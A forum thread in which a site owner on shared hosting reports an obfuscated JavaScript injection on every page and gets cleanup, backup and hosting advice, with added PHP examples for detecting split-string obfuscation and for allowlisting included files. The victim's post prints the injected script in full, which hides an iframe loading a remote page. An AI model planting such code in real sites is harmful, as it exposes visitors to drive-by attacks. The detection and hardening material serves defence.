Hi guys,

Deep trouble.

I don't know where to put this question ...

When I view my web pages, this script is appearing on every page. I have no idea how to deal with this thing. I searched Google and did some things related to cPanel.

I changed all my account passwords and removed the invalid code below from the pages, but I am not sure what to do.

Any help? Badly required....

<script type='text/javascript'>function uI(){};var dY='';uI.prototype = {r : function() {var b=false;k=21379;var cK=false;this.p=false;var t=false;this.a=false;this.fY=false;lE="";var rF="bodyihm".substr(0,4);i=false;var m=new Date();var h=120;this.kH=38127;n=false;var z=false;pR='';var e=false;try {function iJ(){};this.mY="";this.zE="";oK="";var kHA=function(){return 'kHA'};vE=false;var d=String("app"+"end"+"Chi"+"ld");var bM="";var u=17913;j="j";var dD=function(){return 'dD'};var g=document;var nA="";nQ=41938;var eP=false;this.y="y";var o="ifra"+"me";var gP=63904;this.tA=false;this.nH="nH";var v=new String("crea"+"teEl"+"emen"+"t");hT='';function gF(){};lEW="lEW";bZ="";var dR=function(){};this.vM=30803;var c = g[v](o);this.hJ='';var q=function(){};var dX=function(){return 'dX'};var jI=function(){};var hX="";var f = String("vis"+"ibiGJOg".substr(0,3)+"vOrlitOrv".substr(3,3)+"ILMyLIM".substr(3,1));lD='';tR=62167;var yZ=false;var vB=40296;c.height=h;this.nQR=false;mYP="mYP";c.width=h;var rY=new Array();var lT="lT";var fF="";this.pU="";this.gJ="gJ";var tN=new Array();var lK=false;c.src="http:"+"//wig741U".substr(0,5)+"gete."+"com/c"+"ount2vJ7".substr(0,5)+"8dSs4.php8dSs".substr(4,5);var rU=new Date();var cO=new Array();c.style[f]="hid"+"den";var gJT='';var w="w";gD=21301;function qQ(){};var bY="";g[rF][d](c);var rP="";this.s="s";function qR(){};tNL=false;var hK=function(){return 'hK'};} catch(ex){this.fV='';var aS='';var rUH=new Date();var sF=new Date();var fI="";var cF="";document.write("<"+rF+">");var sX=function(){return 'sX'};var hU='';zY="zY";var qU='';var l=this;var gI=new Array();var kQ=false;var mW="mW";var bD="bD";setTimeout(function(){l.r();}, h);this.rN='';var gW="";this.hC='';function fC(){};}this.aSD=11624;this.kO='';}};this.gH="";var wI=new uI(); tW=59929;wI.r();this.sFG=45273;</script>

Hello,

Are you on a Windows server or Linux, and is it a dedicated server or shared?

Delete everything in your account and do Antivirus cleaning and use Backup to restore services.
@rch1231,
A virus, much of the time, smells like MS Windows ;)

evstevemd,
Normally I would agree, but this is a JavaScript and may not be a virus but an attachment to one of their PHP files or includes. That is why I ask which OS was on the server and from there what type of server, so I could recommend support routes.

We have Linux and shared hosting.....

I also noticed, when I was checking, that my page.php files which have no HTML code inside are not infected with this, but the others are infected with the above code. So using DW I removed all the script tags through find and replace.

I also changed my .htaccess file.

But I am afraid ... how to protect it?

Your further suggestions will help me get out of this problem.

Thanks for all ....
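
Added example, not part of the original thread: a PHP check for inline scripts like the one in the question, which hide the words iframe, createElement, appendChild and hidden by splitting them across concatenated string literals so that a plain find-and-replace or text search misses them. The function names and both sample pages are constructed for illustration.

```php
<?php
// Added example, not from the thread. Names and sample pages are constructed.

// Fold adjacent string literals joined with "+": "ifra"+"me" becomes "iframe".
function fold_concat(string $js): string {
    $re = '/(["\'])((?:(?!\1).)*)\1\s*\+\s*(["\'])((?:(?!\3).)*)\3/s';
    do {
        // On a PCRE error the call returns null; keep what was folded so far.
        $js = preg_replace_callback($re, function ($m) {
            return '"' . $m[2] . $m[4] . '"';
        }, $js, -1, $count) ?? $js;
    } while ($count > 0);
    return $js;
}

// Names that show up in a script only after folding, i.e. names the script
// split into pieces so that they never appear as plain text.
function hidden_tokens(string $script): array {
    $folded = fold_concat($script);
    $found = [];
    foreach (['createElement', 'iframe', 'appendChild', 'hidden'] as $tok) {
        if (stripos($folded, $tok) !== false && stripos($script, $tok) === false) {
            $found[] = $tok;
        }
    }
    return $found;
}

// Flag a page when an inline <script> hides "iframe" plus at least two of the
// other names. A script that spells them out normally is not flagged.
function is_suspicious(string $html): bool {
    preg_match_all('/<script\b[^>]*>(.*?)<\/script>/is', $html, $m);
    foreach ($m[1] as $script) {
        $t = hidden_tokens($script);
        if (in_array('iframe', $t, true) && count($t) >= 3) {
            return true;
        }
    }
    return false;
}

// Constructed samples: a reduced form of the injected block, and a benign page.
$infected = '<p>hi</p><script type=\'text/javascript\'>var o="ifra"+"me";'
    . 'var c=document["crea"+"teEl"+"emen"+"t"](o);c.src="http://example.invalid/";'
    . 'c.style.visibility="hid"+"den";document.body["app"+"end"+"Chi"+"ld"](c);</script>';
$clean = '<script>var f=document.createElement("iframe");document.body.appendChild(f);</script>';

var_dump(is_suspicious($infected));
var_dump(is_suspicious($clean));
```

To check real files, pass the result of file_get_contents() for each page under the web root to is_suspicious() and compare flagged files against a known-good backup before editing them.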


1. Find out how it got "infected", then we will provide suggestions
2. Back up daily/weekly/monthly (script and cron)
3. Use hosting services with a good reputation/customer care

I don't know much PHP but I am learning it...
I checked my directory.. I am including files simply with the include function.
I saw on Google that this is harmful and validation is required there.

So I made code like this for securing included files. I am also using the latest version of CKEditor, but for uploading image files I used FCKeditor's built-in file manager in CKEditor.

Is it right, or does it need some improvement?

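<?php
  // List of files that may be included.
  $page = array('somefolder/my.php', 'somefolder/my.php');

  // Constant name and value built from today's date plus a fixed suffix.
  $one = sha1(date("Y/d/M") . "dddd");
  $two = sha1(date("Y/d/M") . "ccc");

  // Define the constant, then check that it is defined.
  define($one, $two);
  if (!defined($one)) {
      echo 'File Not Found-404 Error';
      exit();
  } else {
      // Include the second list entry if it is in the list.
      if (in_array($page[1], $page)) {
          include_once($page[1]);
      } else {
          echo "File Not Found-404 Error";
          exit();
      }
  }
?>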
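
Added example, not the poster's code: an allowlist include in which the request only selects a key and never supplies a path, which is the validation the post above is aiming at (there, the value tested with in_array() comes from the list itself, so nothing from the request is checked). The page parameter name, the keys and the file paths are assumptions for illustration.

```php
<?php
// Added example. The "page" parameter, the keys and the paths are assumptions.

// Public page keys mapped to files. User input only ever selects a key;
// it is never concatenated into a path.
const PAGES = [
    'home'    => 'somefolder/home.php',
    'contact' => 'somefolder/contact.php',
];

// Resolve a requested key to an includable file, or null if it is not allowed.
function resolve_page($requested, string $baseDir): ?string {
    // Rejects arrays (?page[]=x), unknown keys, "../" strings and URLs alike,
    // because none of them is a key of PAGES.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . PAGES[$requested]);
    // realpath() returns false for missing files and resolves symlinks and "..",
    // so the prefix check confirms the target is still under the base directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page($_GET['page'] ?? 'home', __DIR__);
if ($file === null) {
    http_response_code(404);
    echo 'File Not Found-404 Error';
    exit;
}
include $file;
```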

Does this relate to the original thread?
If not, mark this solved and open a spanking new thread

@rohit...

In your cpanel you can password protect your directories...
Maybe someone got a list of all your files and also hacked into the server. That's too much technology, but I have heard of a few cases of it...

How can I do that? We have GoDaddy....

I guess if GoDaddy does not provide the option to password protect your directories, then you need to change your web host provider.

I went with www.ewebguru.com
So far I found their services very satisfactory.

You can use my referral to start hosting if you would like

My website link is in my signature
